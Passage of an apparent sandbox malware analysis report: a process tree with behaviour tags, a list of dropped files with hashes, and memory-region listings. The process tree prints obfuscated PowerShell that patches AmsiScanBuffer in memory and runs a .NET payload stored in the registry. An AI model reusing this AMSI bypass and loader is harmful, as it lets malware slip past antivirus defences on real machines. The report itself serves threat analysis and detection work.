@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$HtKsKNlmEBV=$ufZAuLExtKGAK.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+''+[Char](72)+''+[Char](97)+'nd'+'l'+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')));$vtcsSkOcPqpkbO=$cLQOVRkpSuFzza.Invoke($Null,@([Object]$HtKsKNlmEBV,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$WNGaFpppAAsInOFqX=$cLQOVRkpSuFzza.Invoke($Null,@([Object]$HtKsKNlmEBV,[Object](''+'V'+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+[Char](114)+'o'+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$tphTntW=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vtcsSkOcPqpkbO,$anNpwVUcmoZFimiGdxc).Invoke(''+'a'+''+'m'+'s'+'i'+''+[Char](46)+'d'+'l'+''+'l'+'');$qSOWdotwoGYhgPVsO=$cLQOVRkpSuFzza.Invoke($Null,@([Object]$tphTntW,[Object]('A'+'m'+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+'f'+[Char](102)+''+'e'+''+[Char](114)+'')));$DvjWjwpYTP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WNGaFpppAAsInOFqX,$xkuPELcSDciHTOWQQzcBKu).Invoke($qSOWdotwoGYhgPVsO,[uint32]8,4,[ref]$DvjWjwpYTP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$qSOWdotwoGYhgPVsO,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WNGaFpppAAsInOFqX,$xkuPELcSDciHTOWQQzcBKu).Invoke($qSOWdotwoGYhgPVsO,[uint32]8,0x20,[ref]$DvjWjwpYTP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue(''+'d'+''+[Char](105)+'al'+'e'+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                                  2⤵
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:3136
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:1460
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cCYNMqzrYhTQ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$xQKoHrCqghxEwz,[Parameter(Position=1)][Type]$OutTKlaFpE)$NPWEaEGzlJK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+'efl'+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+'De'+'l'+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''+'r'+''+[Char](121)+''+'M'+''+'o'+'d'+'u'+''+'l'+''+'e'+'',$False).DefineType(''+'M'+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+'e'+[Char](84)+''+'y'+'p'+'e'+'','Cl'+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+'u'+'b'+''+'l'+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+'la'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$NPWEaEGzlJK.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+'e'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$xQKoHrCqghxEwz).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+'e,M'+'a'+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');$NPWEaEGzlJK.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+'o'+''+'k'+''+'e'+'','P'+'u'+''+'b'+'l'+'i'+'c'+','+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+'e'+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+'i'+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$OutTKlaFpE,$xQKoHrCqghxEwz).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'me'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NPWEaEGzlJK.CreateType();}$mnmmwzqhUmSPH=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+'s'+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType('Mi'+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+'of'+[Char](116)+''+[Char](46)+''+[Char](87)+''+'i'+''+'n'+'3'+'2'+'.'+'U'+''+[Char](110)+''+[Char](115)+'a'+[Char](102)+'em'+[Char](110)+''+[Char](109)+''+[Char](109)+''+'w'+'zq'+[Char](104)+'U'+[Char](109)+'S'+[Char](80)+'H');$WRjLedcGUMiPit=$mnmmwzqhUmSPH.GetMethod(''+'W'+''+[Char](82)+''+'j'+''+'L'+''+[Char](101)+''+[Char](100)+'cG'+[Char](85)+''+[Char](77)+''+'i'+''+[Char](80)+''+'i'+''+[Char](116)+'',[Reflection.BindingFlags]'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+'ic',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$GyOPVsptYjNbjhkyBAn=cCYNMqzrYhTQ @([String])([IntPtr]);$XwDJCozfGiSMVYUurFOOxZ=cCYNMqzrYhTQ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$pPMjgrBsUBd=$mnmmwzqhUmSPH.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('ke'+'r'+''+'n'+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$thImQrvaxGIRuB=$WRjLedcGUMiPit.Invoke($Null,@([Object]$pPMjgrBsUBd,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+'y'+''+[Char](65)+'')));$HmXxersZdJwSFcAtL=$WRjLedcGUMiPit.Invoke($Null,@([Object]$pPMjgrBsUBd,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$gmpBGjE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($thImQrvaxGIRuB,$GyOPVsptYjNbjhkyBAn).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i'+'.'+''+[Char](100)+''+'l'+''+'l'+'');$RPErbQvazcCyPxXQD=$WRjLedcGUMiPit.Invoke($Null,@([Object]$gmpBGjE,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+[Char](83)+''+'c'+''+[Char](97)+''+'n'+''+'B'+''+[Char](117)+'f'+'f'+'er')));$asuDnSALxM=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HmXxersZdJwSFcAtL,$XwDJCozfGiSMVYUurFOOxZ).Invoke($RPErbQvazcCyPxXQD,[uint32]8,4,[ref]$asuDnSALxM);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$RPErbQvazcCyPxXQD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($HmXxersZdJwSFcAtL,$XwDJCozfGiSMVYUurFOOxZ).Invoke($RPErbQvazcCyPxXQD,[uint32]8,0x20,[ref]$asuDnSALxM);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue('di'+[Char](97)+''+[Char](108)+'e'+[Char](114)+'st'+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                                                                                                                                    2⤵
                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:1808
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      3⤵
                                                                                                                                        PID:3928
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                                                    1⤵
                                                                                                                                      PID:744
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                      1⤵
                                                                                                                                        PID:1008

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                        Filesize

                                                                                                                                        2KB

                                                                                                                                        MD5

                                                                                                                                        440cb38dbee06645cc8b74d51f6e5f71

                                                                                                                                        SHA1

                                                                                                                                        d7e61da91dc4502e9ae83281b88c1e48584edb7c

                                                                                                                                        SHA256

                                                                                                                                        8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                                                                                                                                        SHA512

                                                                                                                                        3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log

                                                                                                                                        Filesize

                                                                                                                                        226B

                                                                                                                                        MD5

                                                                                                                                        916851e072fbabc4796d8916c5131092

                                                                                                                                        SHA1

                                                                                                                                        d48a602229a690c512d5fdaf4c8d77547a88e7a2

                                                                                                                                        SHA256

                                                                                                                                        7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d

                                                                                                                                        SHA512

                                                                                                                                        07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        19KB

                                                                                                                                        MD5

                                                                                                                                        6859d2b727e6deb2f052b911cd757709

                                                                                                                                        SHA1

                                                                                                                                        1e52d21f9b8514be2e7581e3ef1129144114d9f0

                                                                                                                                        SHA256

                                                                                                                                        8ba5b9ee13bf0eff1588f6be95d96b94f9d038cc1fac2d1224dfe326ccbe3236

                                                                                                                                        SHA512

                                                                                                                                        285bc01d9823a11690085fc3683ddfed64f8c5f5f13da72e204597bc6e9a68284d053146d48e22524e58d51b02c249fcea709c1fa20c172e354b9aae3764e7c5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                        Filesize

                                                                                                                                        948B

                                                                                                                                        MD5

                                                                                                                                        d3976ee5c15a9fa2c0fadc1a864bd6bc

                                                                                                                                        SHA1

                                                                                                                                        5c1933cabd5d9f68d54b934c17fc490262a09459

                                                                                                                                        SHA256

                                                                                                                                        40e164bd699c73dde0bcc8b87ed990c12f03dfd17cab7b8767e7a3fca86d5d14

                                                                                                                                        SHA512

                                                                                                                                        4b2705cf34622008587b43723f1cf272ed10e57666940e24efd8b4a4cb60c91b06cfcd279e12437e0e0af586e5a565675459341c1dea8754cb1fb7b158848367

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                                                                                                        Filesize

                                                                                                                                        1.4MB

                                                                                                                                        MD5

                                                                                                                                        bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                        SHA1

                                                                                                                                        43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                        SHA256

                                                                                                                                        095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                        SHA512

                                                                                                                                        24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe

                                                                                                                                        Filesize

                                                                                                                                        1.4MB

                                                                                                                                        MD5

                                                                                                                                        bb86a343080f9f4696c250ef31a18d9d

                                                                                                                                        SHA1

                                                                                                                                        43b2193dcb1d56eac73ba88a7b461822074192d6

                                                                                                                                        SHA256

                                                                                                                                        095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0

                                                                                                                                        SHA512

                                                                                                                                        24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                                                                                                        Filesize

                                                                                                                                        3.7MB

                                                                                                                                        MD5

                                                                                                                                        f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                        SHA1

                                                                                                                                        85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                        SHA256

                                                                                                                                        ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                        SHA512

                                                                                                                                        d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe

                                                                                                                                        Filesize

                                                                                                                                        3.7MB

                                                                                                                                        MD5

                                                                                                                                        f5c51e7760315ad0f0238d268c03c60e

                                                                                                                                        SHA1

                                                                                                                                        85ebaaa9685634143a72bc82c6e7df87a78eed4c

                                                                                                                                        SHA256

                                                                                                                                        ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa

                                                                                                                                        SHA512

                                                                                                                                        d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                                                                                                        Filesize

                                                                                                                                        1.4MB

                                                                                                                                        MD5

                                                                                                                                        b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                        SHA1

                                                                                                                                        f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                        SHA256

                                                                                                                                        dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                        SHA512

                                                                                                                                        1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\SysApp.exe

                                                                                                                                        Filesize

                                                                                                                                        1.4MB

                                                                                                                                        MD5

                                                                                                                                        b6bbab9f72c88d07b484cc339c475e75

                                                                                                                                        SHA1

                                                                                                                                        f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1

                                                                                                                                        SHA256

                                                                                                                                        dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f

                                                                                                                                        SHA512

                                                                                                                                        1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                                                                                                                        Filesize

                                                                                                                                        455KB

                                                                                                                                        MD5

                                                                                                                                        ee0ad7cc2a5976a5c658da52092977a9

                                                                                                                                        SHA1

                                                                                                                                        c69b99d42a9f9886af74e6a75fd905a5d17d4792

                                                                                                                                        SHA256

                                                                                                                                        f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b

                                                                                                                                        SHA512

                                                                                                                                        ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\new2.exe

                                                                                                                                        Filesize

                                                                                                                                        455KB

                                                                                                                                        MD5

                                                                                                                                        ee0ad7cc2a5976a5c658da52092977a9

                                                                                                                                        SHA1

                                                                                                                                        c69b99d42a9f9886af74e6a75fd905a5d17d4792

                                                                                                                                        SHA256

                                                                                                                                        f0cc93428ff55575086b843e642c33283067a980fc9cb1f17afc3559b101ff1b

                                                                                                                                        SHA512

                                                                                                                                        ca7f8b1409156b7d1b143cfb33f64056a8c2a8ce401dc735c82828521922044f86680ca6c1b4b08955689c5ba11c94930fe64cce37258e621c7d47ee2dafea17

                                                                                                                                      • memory/472-144-0x0000000006240000-0x000000000625E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/472-146-0x0000000070C80000-0x0000000070CCC000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        304KB

                                                                                                                                      • memory/472-151-0x00000000077F0000-0x0000000007886000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        600KB

                                                                                                                                      • memory/472-152-0x0000000007790000-0x000000000779E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        56KB

                                                                                                                                      • memory/472-153-0x0000000007890000-0x00000000078AA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        104KB

                                                                                                                                      • memory/472-154-0x00000000077D0000-0x00000000077D8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/472-155-0x00000000078F0000-0x0000000007912000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/472-156-0x00000000087D0000-0x0000000008D74000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        5.6MB

                                                                                                                                      • memory/472-149-0x0000000007560000-0x000000000757A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        104KB

                                                                                                                                      • memory/472-148-0x0000000007BA0000-0x000000000821A000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.5MB

                                                                                                                                      • memory/472-147-0x00000000073A0000-0x00000000073BE000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/472-150-0x00000000075D0000-0x00000000075DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/472-145-0x00000000073C0000-0x00000000073F2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        200KB

                                                                                                                                      • memory/472-143-0x0000000005C60000-0x0000000005CC6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        408KB

                                                                                                                                      • memory/472-142-0x0000000005B80000-0x0000000005BE6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        408KB

                                                                                                                                      • memory/472-141-0x0000000005290000-0x00000000052B2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/472-140-0x0000000005320000-0x0000000005948000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.2MB

                                                                                                                                      • memory/472-139-0x0000000004CB0000-0x0000000004CE6000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        216KB

                                                                                                                                      • memory/580-220-0x00007FFE14B70000-0x00007FFE14B80000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1020-221-0x00007FFE14B70000-0x00007FFE14B80000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/1460-133-0x0000000000980000-0x0000000000988000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        32KB

                                                                                                                                      • memory/1808-212-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/1808-211-0x00007FFE35E40000-0x00007FFE36901000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/1808-213-0x00007FFE52ED0000-0x00007FFE52F8E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        760KB

                                                                                                                                      • memory/2224-163-0x0000000000BA0000-0x0000000000D0C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.4MB

                                                                                                                                      • memory/2224-176-0x00000000063D0000-0x00000000063DA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        40KB

                                                                                                                                      • memory/2224-165-0x00000000055B0000-0x0000000005642000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        584KB

                                                                                                                                      • memory/2436-190-0x00000242717F0000-0x0000024271812000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        136KB

                                                                                                                                      • memory/2436-193-0x00007FFE353A0000-0x00007FFE35E61000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/2436-194-0x00007FFE353A0000-0x00007FFE35E61000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3252-208-0x00007FFE353A0000-0x00007FFE35E61000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3252-199-0x00007FFE353A0000-0x00007FFE35E61000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        10.8MB

                                                                                                                                      • memory/3596-180-0x0000000004DF0000-0x0000000004EFA000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.0MB

                                                                                                                                      • memory/3596-181-0x0000000004D50000-0x0000000004D8C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        240KB

                                                                                                                                      • memory/3596-188-0x00000000068D0000-0x0000000006920000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        320KB

                                                                                                                                      • memory/3596-168-0x0000000000830000-0x0000000000850000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        128KB

                                                                                                                                      • memory/3596-178-0x00000000052B0000-0x00000000058C8000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        6.1MB

                                                                                                                                      • memory/3596-187-0x0000000007100000-0x000000000762C000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        5.2MB

                                                                                                                                      • memory/3596-186-0x0000000006A00000-0x0000000006BC2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.8MB

                                                                                                                                      • memory/3596-185-0x0000000005DF0000-0x0000000005E0E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        120KB

                                                                                                                                      • memory/3596-184-0x0000000005D10000-0x0000000005D86000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        472KB

                                                                                                                                      • memory/3596-179-0x0000000004CC0000-0x0000000004CD2000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        72KB

                                                                                                                                      • memory/3908-182-0x0000000002210000-0x0000000002714000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        5.0MB

                                                                                                                                      • memory/3908-192-0x0000000002724000-0x0000000002861000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.2MB

                                                                                                                                      • memory/3908-183-0x0000000002724000-0x0000000002861000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.2MB

                                                                                                                                      • memory/3908-189-0x0000000002210000-0x0000000002714000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        5.0MB

                                                                                                                                      • memory/4036-214-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        164KB

                                                                                                                                      • memory/4036-217-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        164KB

                                                                                                                                      • memory/4036-218-0x00007FFE54AF0000-0x00007FFE54CE5000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        2.0MB

                                                                                                                                      • memory/4036-219-0x00007FFE52ED0000-0x00007FFE52F8E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        760KB